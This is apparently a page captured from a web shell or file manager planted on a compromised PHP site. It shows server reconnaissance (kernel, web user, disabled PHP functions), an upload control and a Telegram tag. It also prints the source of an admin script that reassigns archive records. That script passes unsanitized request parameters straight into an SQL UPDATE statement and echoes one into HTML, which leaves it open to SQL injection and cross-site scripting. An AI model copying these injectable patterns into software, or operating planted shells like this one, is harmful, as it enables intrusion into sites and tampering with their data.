HEX
Server: nginx/1.28.1
System: Linux 10-41-63-61 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/fuwufei.xxlht.com1/application/admin/template/custom/
Upload Files
File: /www/wwwroot/fuwufei.xxlht.com1/application/admin/template/custom/zy.php
<?php

include 'conn.php';

$aid=$_GET['aid'];//获取链接的id
 


$sqladmin="select admin_id,true_name from houtai_admin";
$queryadmin=$mysqli->query($sqladmin);  
 
 echo '<form method="post">
 <input  type="hidden" value="'.$aid.'"  name="aid">
 <select name="admin">';
 while($rowadmin = $queryadmin->fetch_array())
{
    if($rowadmin['true_name']!==''){
        
        
        echo  '
     
  <option value ="'.$rowadmin['admin_id'].'">'.$rowadmin['true_name'].'</option> 
 
        ';
         
  echo  "</br>"; 
        
    }
    
  
}
  echo '</select><input type="submit" value="提交"></form >';
  
  if($_POST){
    $admin=$_POST['admin'];    
     $aid=$_POST['aid']; 
       if($admin>0){
   $mysqli->query("UPDATE `houtai_archives` SET  `admin_id` = '" . $admin . "'     WHERE `aid` = " . $aid . "");
echo "<script>alert('转移成功');location.href='/m.php?m=admin&c=Archives&a=index_archives&typeid=72&lang=cn';</script>";
     }

  

  }
@ Telegram